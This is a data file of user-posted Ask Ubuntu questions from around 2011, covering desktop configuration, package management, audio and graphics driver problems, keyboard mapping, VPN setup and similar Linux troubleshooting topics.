56463	how do i send keystrokes to a specific app ?	i 'd like to be able to bind a global keystroke send a sequence of keystrokes to a specific app . specifically : i 'm using the last.fm client , and i 'd like to be able to start/stop music with a global keybinding . is there an app that does this ? i 'm using compiz , if that helps . update : i ended up having to write a bash script . here 's the final product : # ! /bin/sh for x in `xdotool search -- class last.fm` do if ( xprop -id $ x wm_window_role | grep menucontrols ) ; then xdotool type -- window $ x ctrl-m break fi done
56471	how to find the most recent version of a package in the repositories ?	how do i find the most recent version of a package in the repositories in a shell script ? if i use apt-cache-policy , i get the installed version as `` candidate '' , not the most recent one from the repositories . apt-cache policy nvidia-current shows : nvidia-current : installed : 280.13-0ppa~natty1 candidate : 280.13-0ppa~natty1 version table : *** 280.13-0ppa~natty1 0 100 /var/lib/dpkg/status 270.41.06-0ubuntu1 0 500 http : //archive.ubuntu.com/ubuntu/ natty/restricted amd64 packages it looks like the installed version is marked with *** , so that one must be ignored . perhaps there is an awk script that could be used ?
56476	how to synchronize an ntfs partition with ubuntu one	i have an ntfs partition , on this partition i have all documents , images , music , etc , but i ca n't synchronize these folders with ubuntu one .
56479	how to move from 10.04 32bit to 11.04 64bit ?	i installed ubuntu at a time when i did not know whether my laptop was 64bit compatible . stupid of me not to check . i currently run 32 bit ubuntu 10.04 . the issue is that i wish now to migrate to natty 11.04 64 bit . i know that i will have to uninstall and reinstall . can someone list down the steps also how do i do a seamless migration where all the applications which i have so painstakingly installed get retained also what about the little customizations i may have done . fundamental question what will i gain with 64 bit or is it wise to stick to 32 bit with pae . i have 8gb ram on my machine..
56480	how to run samsung android kies software on wine ?	i 've a samsung galaxy mini with android 2.2 . kies , the software provided by samsung to manage my phone , does n't run on linux , . i 've tried to run it on wine , but it does n't work at all . is there any way i can get this running on wine ?
56486	`` amixer set master mute '' not working with external usb speakers	i 'm trying to get the command `` amixer set master mute '' to work when the active sound output is an external usb speaker , but it does n't work . it only seems to work if the output is the built-in speaker or the headphone out . any suggestions ?
56490	application names from ubuntu 's perspective	i was wondering how ubuntu is able to figure out the proper name of an application . for example , when you select open with - > other application from the context menu , you are presented with this list . how does a developer teach ubuntu the name of their application , and how can another developer retrieve the name of an application from the system ? i do n't need actual code , rather i 'm just interested in the conceptual side of things .
56492	headphone jack has no sense	how can i mute the speakers when the headphones are plugged in ? i have searched all over the internet and although there are many threads that discuss this , none has worked for me . i have tried alsamixer and installing linux-backports-modules-alsa-lucid-generic , but neither worked . the speakers just wont mute when i plug in the headphones . i had this problem in 11.04 and hoped it would be one of the headaches to go away when i downgraded to lucid lynx . cat /proc/asound/card0/codec # * | grep codec codec : realtek alc665 codec : intel cougarpoint hdmi model name : alienware m14xr1 ( ps : i am not a gamer so i have no attachment to windows : ) ) $ lspci | grep -i audio 00:1b.0 audio device : intel corporation cougar point high definition audio controller ( rev 05 ) $ sudo lshw -c sound *-multimedia description : audio device product : cougar point high definition audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 05 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=hda intel latency=0 resources : irq:50 memory : da800000-da803fff
56493	ubuntu theme installer crashes whenever i try to install a new theme ?	i am very bored of the default themes in ubuntu , not because they are bad just because i get bored easily ! i decided to visit gnome 's theme library and found a theme i like . i downloaded the theme and tried to use the install feature in the theme panel . as soon as i click okay after finding the theme package my system freezes . i decided to try the other way and selected open with ( theme installer ) which did exactly the same thing . is there a terminal command to install themes or a way to reset the theme manager ? i am using natty and gnome 2.32.1
56496	resolvconf dnsmasq issue - system startup leaves blank dnsmasq resolv.conf file	on system start , /var/run/dnsmasq/resolv.conf file ends up being blank . i had expected the resolvconf package to update it with the info from /etc/network/interfaces ( dns-nameservers , dns-search ) . i 'm running a ubuntu 10.04.2 lts lucid server . i have both resolvconf and dnsmasq installed . here 's the interfaces file section for eth0 ( changed ip and dns names ) : auto eth0 iface eth0 inet static address 10.100.1.100 netmask 255.255.255.0 network 10.100.1.0 broadcast 10.100.1.255 gateway 10.100.1.1 dns-nameservers 10.100.2.2 10.100.3.2 dns-search my-domain.com mydomain.com if i run ifdown eth0 & & ifup eth0 after start up , then the /var/run/dnsmasq/resolv.conf file is correctly populated .
56500	is there an easy way to install o3d in chrom ( ium ) / firefox ?	in order to view a page that uses o3d , it looks like i need some sort of plugin for chrome/chromium/firefox . however , it seems like the only way to even get the plugin running in chrom ( ium ) is to build the whole thing myself . is there any way to get my hands on a precompiled binary ? and how come the version of firefox that ships with ubuntu does not have native support for o3d content when the windows version of firefox ships with it out of the box ?
56504	how do i upgrade thunar from 1.2.1 to 1.2.2 and beyond	i 'm looking to upgrade my thunar from 1.2.1 to version 1.2.1 ( i 'm running 11.04 ) . my reasoning is that i am growing tired of waiting 30 seconds for thunar to open after a reboot ( i believe this is an issue with gvfs-backends ) . i understand that ubuntu 11.10 comes with thunar 1.2.2 and no longer has this issue . any advice would be appreciated . thank you
56506	unity compiz close window effect does nothing on window close	i have ubuntu 11.04 64 bit and i 'm using unity , i decided to start using the pretty compiz effects , and they do work , when i open a window , the open window effect works , same with menus , tool tips , etc. , and they work with the close window effects too , the tool tips and menus and whatnot burst into flames when they disappear ( which is my closing effect ) however when i close an actual window , like firefox , nautilus , or another full window , it just closes normal , no flames , and like i said , the other effects are working . when i minimise windows the effects work , when i open them , it 's just when i close them , and like i said the closing effects do work on menus , tool tips , etc. , so it has nothing to do with the effects settings there . any help is greatly appreciated , i want my windows to burn !
56507	amsn icon tray , where is it ?	i opened amsn and closed it , but when i try to re-open it , it says that i already have an amsn session open , but i can not see my icon anywhere to re-open it .
56508	how can i access facebook and other forbidden websites in china ?	i 'm flying to china soon for a long time , so i 'd like to know how to configure my ubuntu 11.04 so i can access forbidden websites ( like facebook ) i 've heard about vpn and proxy , but i do n't know how to work with those . what would be a good solution for me ?
56509	danger of using an untrusted apt mirror or proxy	my vague understanding of the authentication mechanisms behind debian/ubuntu packaging tells me that it should be safe to install packages downloaded from an untrusted server or proxy as long as apt is able to verify them without issuing warning messages . is this correct ? for example , say i 'm trying to connect to the standard ubuntu servers to do security updates ( i.e . security.ubuntu.com ) . to reduce bandwidth consumption , i 'm going through a local apt-cacher proxy , but it 's possible that someone may have tampered with the packages cached on that proxy server . or there may even be a transparent apt proxy along the line somewhere . will i get a warning if the packages are not the correct ones ? how does updating my apt cache ( sudo aptitude update ) affect this ?
56512	flash video gets stuck often	i use ubuntu 11.04 , the flash videos gets stuck frequently . however the audio still plays , if we scroll the window a bit then the video plays properly . otherwise it gets stuck , this behavior is same for all video sites ( youtube , google video etc )
56517	ubuntu one does not work right with gnome 3 in 11.04	today , i decided to try ubuntu one . but unfortunately it 's not working : did anyone encounter any similar problems ?
56518	custom unity launcher for audacity	i use audacity a lot so would like a custom launcher menu for audacity in unity . similar to this list of custom launchers & quicklists for unity but specific to audacity menu may include something like 'new file ' with out obtained message ' a session audacity is currently open ... ' etc ps : sorry for my english ... --
56523	problem installing mysql , error in post-installation script	having problems loading/installing mysql here is the output while installing : mysql-server-5.1 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/6,258 kb of archives . after this operation , 13.5 mb of additional disk space will be used . preconfiguring packages ... selecting previously deselected package mysql-server-5.1 . ( reading database ... 256988 files and directories currently installed . ) unpacking mysql-server-5.1 ( from ... /mysql-server-5.1_5.1.54-1ubuntu4_i386.deb ) ... processing triggers for ureadahead ... processing triggers for man-db ... setting up mysql-server-5.1 ( 5.1.54-1ubuntu4 ) ... 110810 11:01:32 [ note ] plugin 'federated ' is disabled . 110810 11:01:32 innodb : initializing buffer pool , size = 8.0m 110810 11:01:32 innodb : completed initialization of buffer pool 110810 11:01:32 innodb : started ; log sequence number 0 44233 110810 11:01:33 innodb : starting shutdown ... 110810 11:01:38 innodb : shutdown completed ; log sequence number 0 44233 start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.1 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) if anybody can help would be appreciated
56524	unity not supported on an hp pavillion g6	i installed ubuntu 11.04 on my new hp pavillion g6 laptop . unity was running from the livecd . however , when i installed it , it would n't work . i logged in using ubuntu classic , and installed the proprietary graphics driver , hoping this would make it work , but it did n't . choosing `` ubuntu '' or `` ubuntu classic '' from the login screen yields to the same thing : gnome2 without unity . how do i enable unity ?
56525	e4300 mouse click/paste while typing	i have a dell e4300 that is having some irregular mouse driver issues with a fresh install of ubuntu 11.04 x64 . i have used other versions of ubuntu without issue . windows works fine , so it appears the hardware is working properly . this leads me to believe a driver issue , however i am in need of some direction . keep in mind that all this is with a fresh install . no docking station , only a usb microsoft intellimouse . these issues occur with/without the mouse connected . issue scenario 1 : when i am typing my password to login to the box , if i place the mouse cursor at a location on the left side of the password window , i can type the password normally until i type to the right of the mouse . at that point , every keypress moves the cursor to the mouse location , then inputs the key . if i move the mouse outside of the text box , the focus is removed from the text field after each keypress . this allows one character to be entered at a time . i can login successfully if the mouse is moved to the very right of the text field . issue scenario 2 : once logged in , i will often be required to press a key on the keyboard to be able to click on something/anything within gnome . the keyboard press does not seem to actually input anything , just allows the mouse to click . issue scenario 3 : when i attempt to highlight a group of text , the os automatically will copy the text . when i attempt to type , the mouse would take the cursor focus ( similar to scenario 1 ) , and also copy that previous text . if i attempt to type multiple characters , it will paste the information at the mouses location within the text field multiple times . i have tried : to reinstall . updated all patches load various drives through the software i can get around linux/terminal , so i do not consider myself new . however i am certainly not a pro . suggestions ?
56528	how can i have inertia scrolling for my touchpad ?	i 'd like to have inertia scrolling for my touchpad , how can i do this , thanks !
56531	how do i mount a drive so that it is readable by me ?	i 'm working with over ssh with an external hard drive connected by usb . i know i can manually mount a drive with the following command : sudo mount /dev/sdc ~/dirtomountto the problem is , if i do n't do it as root , then it says `` mount : only root can do that '' . if i do it as root , though , i ca n't access , read , or write files as a regular user . only root has permissions to do anything in the directory . how do i mount it so that i can work within it without being root ?
56533	conky , show desktop , swap & network meters , remove background	i used conky colors to generate my conky script conkyrc : http : //pastebin.com/cfj2zj07 output : how can i remove the black background ? notice the swap & network meteres does not appear to work ? conky dissapears on using `` show desktop ''
56535	remote desktop from ubuntu to windows ?	i want alternate to dameware which will be free . as i want to give remote support from linux desktop to windows desktop . avoiding vnc we need install vnc server on all windows desktop . ca n't use rdp because want same session . want something in which can install software over air .
56541	can i set-up a shared network during install ?	i 'm in the process of installing ubuntu server , though the computer has no wifi-card . our router is in a different room , and i do n't have money for a wifi-card right now . so , until i get a card , i was hoping to use a shared connection from my laptop . i 've figured out how to share the connection from my laptop . though the installer tries to set up the network , and it fails , even though it 's connected via ethernet to my laptop . can anyone offer some guidance on this issue ?
56542	how to run tomcat as service and not use root user	i copy catalina.sh to /etc/init.d/tomcat and sudo chkconfig -- add tomcat it started as root user , i want use another user , how ?
56547	what happened to gobuntu ?	some time ago there was available an official ubuntu derivative named gobuntu that was using free software only . i think i have not noticed when it was abandoned ... why is it no longer continued ?
56548	passing function keys in htop	when using htop , the function keys ( eg . f9 for kill , f7/f8 for renice.. ) seem to be captured in the os rather than in htop . how can i get those keystrokes handled by the process ( i.e . htop ) ? i am using the default gnome terminal in ubuntu 11.04
56549	why is access denied when i run hwinfo	i recently had someone install ubuntu on my laptop and something just does n't feel right about it . i am a newbie and do n't really know what i 'm looking for or how to look for it . after trying to make sure none of my hardware had been swapped out and trying to find my webcam , i discovered i was set up as a user only . i asked for the superuser pass and i was told the root password but even logging in as root does n't allow me access to hwinfo . also when i try to run anything sudo related i get 'ca n't resolve host sudo ' . can somebody please help me with this ? is this normal ?
56555	how do i change a local apps locale in ltsp ?	i 'm wondering how to change locale ( ui gtk ) inside local apps to ru_ru for example instead of en_us . ror example i install chromium-browser inside client image chroot /opt/ltsp/i386 apt-get -y install chromium-browser ltsp-update-image -- arch=i386 booted from thin client i see ldm in ru_ru lang login to x session ( gnome ) everything is in ru_ru but trying run ltsp-localapps chromium-browser and see chromium with en_us interface ... but i need in russian i 've added file on both host ( /etc/default/locale ) and thin client image ( /opt/ltsp/i386/etc/default/locale ) with lang=ru_ru.utf-8 language=ru_ru.utf-8 lc_all=ru_ru.utf-8 but nothing changed lts.conf also has ldm_lang=ru_ru.utf-8 in it ... is it possible to change lang of localapps ?
56557	make custom programs in keyboard shortcuts starts from user home dir ?	it seems keyboard shortcuts launch user command from the root directory , rather then current user home . take an example : as `` gedit '' is launched from the root directory , the default save location is also the root instead of default user home . i know i can make it always be launched from the user home by : sh -c 'cd $ home ; gedit' but i 'm bored to wrap them in a shell each time i add a keyboard shortcut . i 'd like to know whether i can configure keyboard shortcuts so it will be in the current user home by default . ( i do n't know which package keyboard shortcuts belongs to , so please add the correct tags for me )
56559	how do i set up a pptp vpn on my own ubuntu server ?	assuming i have a virtual private server from someone like linode , running ubuntu , how do i easily set up a pptp vpn so that ubuntu clients can connect to it ? by default , ubuntu offers to connect to these pptp networks . i want to set it up in such a way that it 's very easy to connect to ( i.e . without installing any packages on the client ) .
56560	what exactly is meant by `` eliminate dead keys '' ?	when i choose my country ( norway ) i get two particular choices : norway norway - eliminate dead keys what is meant by `` eliminate dead keys '' ? what does that do ? which one should i choose ?
56565	installing mysql-server-5.5.15-1.linux2.6.i386.rpm	i downloaded mysql-server-5.5.15-1.linux2.6.i386.rpm from mysql.com . but i do n't know how to install it .
56566	where has the ubuntu one contacts app for android gone ?	i had problems syncing my android 2.3.4 device with ubuntu one contacts cloud . so i decided to reinstall the android app . but i ca n't find the app any more . where is it ? how can i sync the contacts of my android device with the ubuntu one cloud ? at the moment , unfortunately , my contacts on the android device are empty ! i am paying for this service .
56570	how do i copy text from the program `` screen '' to my clipboard ?	i want to copy some text from screen to my clipboard . i know how to get into copy and paste mode in screen , but i want that text to go to my clipboard so i can paste it on the browser , for example . how do i do this ? thanks !
56573	mac os keyboard layout in ubuntu	after working for some time in mac os i realised that i quite like the position of `` command '' key and various system-wide combinations it is used in , such as command-w for closing document windows or command-q for quitting apps . form usability/ergonomics standpoint it is way more convenient for me personally to use 'alt ' or 'command ' key and not having to reach for control key . since a lot of programs in ubuntu do already support similar combinations , namely ctrl-w/ctrl-q , i wanted to re-map those to be like their mac os counterparts . so , i would like to do the following remap : ctrl-w - > alt-w ctrl-q - > alt-q ctrl-c - > alt-c ctrl-v - > alt-v etc can that be done via , say xmodmap , or any other means ?
56575	bluetooth audio stops working after some random time	i am using ubuntu 11.04 and want to use my new nokia bh-503 bluetooth headsets with ubuntu to watch movies and listen songs . i can pair my headsets using a bluetooth dongle , and even see it in sound preferences and by setting it as default , i can use them with movie player and rythmbox player . however , after some random time , the audio just stops . it does n't come up until i switch to different default device in sound preferences or disconnect my bluetooth dongle and reconnect all again . please help me fix this issue . i tried with totem movie player and vlc . same issue persists .
56576	terrible gnome shell appearance	i am using gnome 3 with ubuntu 11.04 but i have a strange problem that happened after some updates . i can change the gnome gtk theme but i am not able to change the gnome shell theme and my titlebar is at least annoying . if i change theme it just changes the title background color from blue to orange etc . in addition in shell theme it does not allowing me to choose a theme . it says something about extensions but if i choose `` shell extensions '' that displays an empty page withnno configuration .
56578	`` ls '' not working on ubuntu 10.04	all of the sudden the handy command ls stopped working on my ubuntu 10.04 server . the only thing i did was add a new entry to the path environment variable and that was all . here is the result from echo $ path : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /root/java/bin why this is happening ? also , i navigated to the /usr/bin folder and the ls program was there but i was n't able to run it from there either . edit : 'ps ' is also not working . i also tried to remove the lines i edited on .bashrc and nothing changes plus stat /bin/ls gives me this : size : 39696 blocks : 80 io block : 4096 regular file device : 802h/2050d inode : 13377592 links : 1 access : ( 0755/-rwxr-xr-x ) uid : ( 122/ unknown ) gid : ( 114/ unknown ) access : 2011-08-11 06:25:04.000000000 +0200 modify : 2010-09-21 20:32:55.000000000 +0200 change : 2011-07-24 17:22:39.000000000 +0200
56583	button padding only working on default theme	button padding is working only on default theme ! on other themes when the active window is small there is no padding ! youtube video : http : //www.youtube.com/watch ? v=4ay8gyyjum8
56588	how do i install a newer version of r on 9.10 ?	i am trying to install r on my ubuntu 9.10 machine but when i use the repository i tend to get the r version 2.8 which is quite old . is there a way to install r latest version on my machine . ubuntu upgrade are not possible now . or is it possible to use packages from the lucid lynx packages for my installation .
56594	dependency cycle lucid -- oneiric	i am trying to install php5.3.6 on lucid lynx using oneiric repository to have everything in place on the ubuntu way and avoid manual package compiling . i got the following error : could n't configure multiarch-support for libdb5.1 , probably a dependency cycle . the problem is libdb5.1 is depending on multiarch-support but multiarch support wants to install libdb5.1 . command used : sudo apt-get -t oneiric install php5 php5-common libapache2-mod-php5 when i try to install multiarch-support same way it says the same thing . how should i solve this ? the reaason for this is to change between versions of softwares on a clearer way without building custom deb packages from source . update 1 yes , i am aware of this but i am just trying different scenarios because some of our development sites needed php5.2.x before that i installed from karmic repository on ubuntu lucid lynx and worked perfectly . so i just wanted to test what if i want the most fresh version from oneiric repository . i hoped there is something than compiling it manually from source that i also tested and worked perfectly .
56597	is it possible to activate the screensaver upon autologin , then unlock keyring on screensaver unlock	i know there 's a lot of dupes around the keyring , but i did my research , and i think my question is unique : is it possible to 1 ) lock the screen during autologin-boot ( to maintain security , but have the comfortable autologin start the desktop while you fetch coffee ) 2 ) then , when arriving at the computer , you unlock the screensaver with your password , and at the same time ( by this process ) the keyring gets unlocked ? ( to save yourself having to enter your password twice in a row , once for the screensaver , once for the keyring ) this approach would have the benefit that alice could enjoy automatic startup without sacrificing too much security ( i.e . no unlocked autologin ) , and save her from entering her password multiple times ( by combining screen and keyring unlock - an ok approach security-wise i think ) . it would effectively , from a user perspective , behave like a conventional startup & login process , only that your system is fully ready once you enter the password ( under the conditions of one-user systems and unattended boot up - not untypical for laptop users i maintain ) . information found so far : ad 1 ) : i found this brainstorm , but on adding his code to .profile , my screensaver unlock prompt just endlessly blinks on and off , so this is probably an obsolete process . any other options or corrections to the linked one ? [ edit ] : ok , this part worked by adding gnome-screensaver-command -al to the startup applications . sadly , on unlock the keyring unlock dialog greets me , so # 2 is still outstanding . ad 2 ) : i could n't find any hints as to if this is possible . [ edit2 ] : it seems there is currently no way to do this , except by disabling the keyring password .
56599	executor/launchy alternative for linux ?	i am a new ubuntu user and i am looking for an alternative of executor http : //executor.dk/ , a keystroke launcher . i mentioned launchy as most people know it . i have tried gnome do which is very similar to launchy and it 's good but there i still miss executor . the major difference between launchy and executor is the the emphasis on user defined keywords , which allow users to set keywords for launching any given application.in other words you can create your own commands/keystrokes . i also do n't like gnome do indexing all my programs , as i do n't use all of them , instead i like to make my keywords/progs/folders paths .
56611	is there a way to use the search functions of synaptic from the command line ?	i love synaptic 's ability to search the repo for both installed and uninstalled packages , but i would like to use this same ability through the apt command line utility , so i can search for packages from a shell . is there a way to do this ? thanks for any replies !
56613	shutdown is always a surprise ?	each time i shut down my 11.04 , i get a screen like the picture below before it actually turns off ... any idea why ?
56619	does ubuntu support 3tb or more hard drive sizes	i have a chance of buying thanks to a friend a 3tb hard drive but i have heard a problem about passing the 2tb barrier . will i be able to boot form it or use it correctly ( detected correctly ) or is it recommended i use it as a second hard drive to save files but not as the main bootable drive .
56622	how can i see a wireless network 's frequency and/or channel ?	networkmanager is showing a number of different wireless networks available in my neighbourhood . i would like to know what channels the other wireless networks are operating on . how can i view these wireless network 's channel information ? i am aware of the iwlist scan command but it does not see most of the networks that networkmanager sees : the networks shown by running sudo iwlist wlan0 scan are completely different from networkmanager 's list .
56624	maven repository manager package	is there any package for a maven repository manager ? i searched for some of the ones i know , but could n't find any . i 'm wondering if they are just not available , if they have names different than what i searched for , or , perhaps , if there 's some i may have missed .
56632	how can i configure notifyosd ?	is there a way to configure notifyosd by using the terminal or an application ?
56633	software for free netcafe ( so computer tracking software )	i 'm working in a small council . here is some ubuntu ( with gnome - no kde ) based workstations in our library . using the computers is free now , before it was only /hour , what is not a high cost . i 'm looking for a software , which can help me to manage the computers . how i mean : notice the user after x minutes , to give her/his place for another user ( if there are someone ) = a text notice after x minutes ( it would be better , if it gives a small signal too with the hardware speaker ) . auto ( & remote ) shutdown of the workstations , ( also disable them ) . [ auto power on is not required , because the users can push that power button , if they want to use the machines : d ] statistics and other infos about workstations , also their health status ( i know munin , but included feature would be better ) . eg : temps , smart datas , login time , remaining time ... ( updating all systems at once ... ) free maybe , cafe softwares wo n't meet my requirements , i do n't know how can i call that software for that situation . i can also appreciate multi software solution . i read this page , but these softwares are focused on paying .
56638	replace audio stream from one file with audio stream from another	i have got two video files : .mp4 , with a single ( incorrect ) audiostream , and an .mkv , with two audio streams ( one incorrect , the other correct ) is there a way to replace the audio of the .mp4 file with the second stream in the .mkv ? thanks
56640	slot machine games for ubuntu ?	my sister is looking for any linux slot machine games . she has pretty much tapped out all of the chrome apps slot games . any other suggestions that are maybe installable with a deb perhaps ? thanks !
56642	ca n't purge java bin installation	i tried doing this : sudo dpkg -p package_name sun-java6-bin and it gives me this dpkg : warning : there 's no installed package matching package_name dpkg : dependency problems prevent removal of sun-java6-bin : sun-java6-jre depends on sun-java6-bin ( > = 6.26-1lucid1 ) | ia32-sun-java6-bin ( > = 6.26-1lucid1 ) ; however : package sun-java6-bin is to be removed . package ia32-sun-java6-bin is not installed . dpkg : error processing sun-java6-bin ( -- purge ) : dependency problems - not removing errors were encountered while processing : sun-java6-bin what should i do now ?
56645	ui elements become completely unresponsive	many of my ui elements become completely unresponsive . this happens in both unity and gnome classic . there are lot 's of examples of this , but usually only some of the ui elements are unresponsive ( e.g. , i ca n't move a window , but i can click a menu somewhere else ) . the system is not lagging , the ui simply does n't work . sometimes i can get it to work by doing something unrelated ( e.g. , closing one window with alt-f4 might allow me to move another frozen window ) . this begins to happen immediately after i login . the behavior is repeatable , but there are so many ui elements that turn on and off that it can get very unpredictable . i can usually press super to get the dash and alt-f2 to get a command prompt . also alt-shift-t seems to usually work to bring up a working terminal ( at least one that accepts commands , even if i ca n't move the window ) . does anyone have any ideas on what might be causing this ? the behavior is highly unpredictable and extremely frustrating . i should note that key commands do n't always work , even though they seem to in my examples . so i do n't think it 's just a mouse issue . thanks for any help . distro 11.04 . update manager has no available updates for my system , so i assume i 'm up to date . someone on launchpad suggested checking other accounts . in fact , making a new user and logging into that account , fixes the problem there and on my original account . deleting the user makes the problem come back . there 's no change when i add the edd=on parameter on boot . also , i have to login to the new user before the problem stops on my usual user . this works as a temporary solution , although i 'd really prefer to know what 's going on ( now i 'm really confused ) . also , i do n't particularly want a second account if it 's unnecessary . does anyone know what 's causing the problem and making it come back when i delete the second account ? system info : cpu : intel core i7 950 ram : 8gb gpu : nvidia gtx460 se motherboard : asus sabertooth x58 free disk space : 650 gb ( 64 % ) ( two 2gb drives which are in a raid 1 array ) some other things i 've tried are : unity -- reset gconftool-2 -- recursive-unset /apps/compiz-1 rm -rf .compiz .gnome .gnome2 .gnome2_private .gconf .gconfd .metacity also , i 've discovered that having another user account is not enough . if i restart or even suspend my system , i need to login to the other account first before my own . also also , the unity -- reset command segfaults when i run it through a tty . the line in the syslog concerning it is aug 14 11:26:43 ubuntu-desktop kernel : [ 217.921661 ] compiz [ 2539 ] : segfault at 58 ip 00007f674f345c51 sp 00007fffdfc43508 error 4 in libnvidia-glcore.so.270.41.06 [ 7f674e3b3000+144e000 ] i do n't know if that will be helpful or not , but i thought it was weird . i seem to have the same problem as poster # 9 here . that is , i have the nvidia advanced graphics drivers installed , but the additional drivers pane says they are n't in use . i 'm confused by this though , since the driver description says they 're needed to run unity . so either the description is wrong , or they are indeed in use . i still do n't know if this is related to my current issue , particularly because i did n't change the drivers at all , and the same configuration exists on the new user account where things are fine . edit : i deleted a compiz-1 folder from ~/.config/ to no avail . there was no compiz folder there . i do n't think the nvidia issue is related . i 've updated my graphics drivers to version 280.13 , which is the latest from nvidia . on fossfreedom 's suggestion i uninstalled those and installed the 173 drivers despite not supporting my graphics card . predictably , i got no graphics and used single user mode to update my graphics again . more pressingly , i 've discovered that the secondary user does n't solve the problem as i previously thought . the first user to log in ( no matter which user it is ) has the issue . the second user to log in fixes the problem for both users . previously i had always logged into my own account and then logged into another , so i never noticed this . this new development means that i ca n't carry out my previous plan of switching to a new user account . at this point , i 'm pretty close to reinstalling . i have another harddrive in the mail that will be large enough to back up all my data completely . but please , if anyone has any more ideas , tell me . i do n't really want to reinstall if i do n't need to do so .
56651	bad install of bisigi themes	e : type ' : //ppa.launchpad.net/bisigi/ppa/ubuntu ' is not known on line 2 in source list/etc/apt/sources.list.d/bisigi-ppa-maverick.list e : unable to lock the list directory this is blocking me from entering the synaptic package manager ! what is going on ? help !
56654	why am i stuck at a certain resolution ?	i 've got a dell inspiron 6400 and i use ubuntu 11.04 , when i connect my tv screen via vga it only works at a 1024x768 . it worked fine in 10.10 at the full resolution 1360x768 . i 've tried lots of steps but nothing worked , the resolution just wo n't change to 1360x768 . if anybody can tell me what to do step by step i would appreciate . sometimes it says it ca n't find the desire mode .
56656	how to use pitivi to edit films ?	i want to edit some films i 've made - i already have sound , do n't want to add any . i would like to cut the films , add fx and titles . i can get the film into the box on the right but not onto the timeline section underneath . the sites explaining pitivi have a different looking interface compared to mine . is this the correct program to use for what i want ? how do i do it ?
56657	installing trac with subversion	hey i am still installing ubuntu ... ... and i have error at the end i am following this link `` http : //trac.edgewall.org/wiki/ubuntu-11.04-subversion '' almost at the end it says ... ... ... ... . finally , you must grant admin rights to the user you 've just created : trac-admin /var/lib/trac/yourproject permission add admin trac_admin when i insert this command trac-admin /var/lib/trac/yourproject permission add admin trac_admin it gives the following error ... . integrityerror : ( 1062 , `` duplicate entry 'admin-trac_admin ' for key 'primary ' '' ) can anybody help please ... ... ... ...
56658	printing photos to the photo tray ( of hp photosmart ) ?	we have a hp photosmart b210 series printer . the driver installed automatically without hassle ( 10.04 lts lucid lynx ) when i plugged the printer in and printing to a4 works like a charm . however , this printer has a separate tray for photo paper ( up to 13 x 18 cm ) and while it is possible to choose photo tray as the paper source from the printer dialog , it displays a4 for the paper type and this can not be changed . ( printing from the gnome image viewer . ) since this laptop is primarily used by my parents , a one-click solution where they just have to select `` print to photo '' and have all tray/paper/border/quality settings automatically chosen would be ideal . i 've already updated to the 3.11 drivers from the ppa , but it 's not really helping . for example : i can select photo-tray+best-quality from the gnome picture viewer , but in the printer dialog of the picture viewer , i can not change the paper size from a4 , so as soon as i try to print , i get an error telling me that the paper size does n't match . ( obviously , as the photo tray only supports up to 13x18cm ) then i installed the gnome photo printer , but this utility , while being able to print to the photo tray , does n't allow me to select output quality and will print with the default a4 paper quality to photo paper : :- ) ideas ?
56664	english language with norwegian locale+keyboard ?	wanted to try out ubuntu server , and i 've been stopped by a stupid issue . during the install i choose english language ( since that 's what i want ) . then i choose norway as my country , since that 's where i live . on the next screen however , it asks me for locale and it only gives me en_* options ? not being able to select anything better i have to go with en_us . i 'm also not able to select a norwegian keyboard layout during the install , which of course is annoying . working in the terminal with the wrong keyboard layout is basically impossible ( unless you have that other layout in your fingers ... which i do n't ... ) . so , what do i do ? how can i fix this ? i want to try out ubuntu server with english language , but with norwegian locale and keyboard layout . in regular ubuntu this was not a problem at all . update : temporary `` solution '' i found was to reinstall and remember to select both language and keyboard layout in the initial menu you get when booting from the installation media . you can select layout by using one of the f keys , and seems like it remembers this choice through the installation . at least the keys seem to do the right thing now : p
56666	how do i remove openjdk ?	i had removed openjdk installed by default from ubuntu software center . eclipse had been showing that installed jre is openjdk . i wanted eclipse should be configured to jdk i already installed and configured . after removing installed jre from eclipse and pointed to my jdk installed , when i run my project i am facing an error that `` starting apache-tomcat-6.0.32 the specified jre installation does not exist '' . i had deployed application war at tomcat webapps and applicaion is running fine . also , my core java is executed fine by eclipse . kindly provide some suggestions .
56673	how to permanently enable compressed ram swap ? what version to use ?	edit : in precise there 's now zram-config . it 's an upstart job compressing up to half of your ram spread over $ ( number of cpu cores ) swap devices . it did n't allways start at boot but issuing sudo service zram-config start works . i enabled compcache= '' 256 m '' in /etc/initramfs-tools/initramfs.conf as described here ( by me : p ) . this - i believe - creates /dev/ramzswap0 but it is never enabled as swap . it works only after mkswap & & swapon . then there is the module zram that creates /dev/zram . is it something else ? it works the same way but /dev/ramzswap is created from the module ramzswap . at the end of the day i wan na have a compressed swap in ram and use the better of the two and for that i need to know how to enable it permanently in a non hackish way . how is this done ? i wrote about ramzswap in lucid here but things have changed in natty . you can still enable ramzswap in initramfs.conf but it does n't get activated . p.s . : i scanned all udev rules in /lib and/etc but found nothing of interest .
56674	how to change mimetype image for psd file ( photoshop ) ?	following this link https : //help.ubuntu.com/community/addingmimetypes , i first typed a command to discover the mimetype for psd extension ~ $ grep 'psd ' /etc/mime.types image/x-photoshop psd then i took photoshop cs5 svg image from wikipedia and renamed it to image-x-photoshop.svg . then i copied the file to the folder /usr/share/icons/gnome/scalable via command sudo cp image-x-photoshop.svg /usr/share/icons/gnome/scalable/image-x-photoshop.svg loogged out , logged in , but the icon for the .psd files is still unchanged . does anyone know what i am doing wrong ? i use ubuntu 10.10 . thanks in advance
56676	which program is used to map keyboard in 11.04	i have a few key re-mapping to do , and in order to do it in the proper way , i 'm looking for the program that handles this in ubuntu 11.04 . i 've read things about xmodmap , but also xkb and perhaps ibus has something to do with it . so what 's the program dealing with key mapping in ubuntu 11.04 ? thanks , mathieu
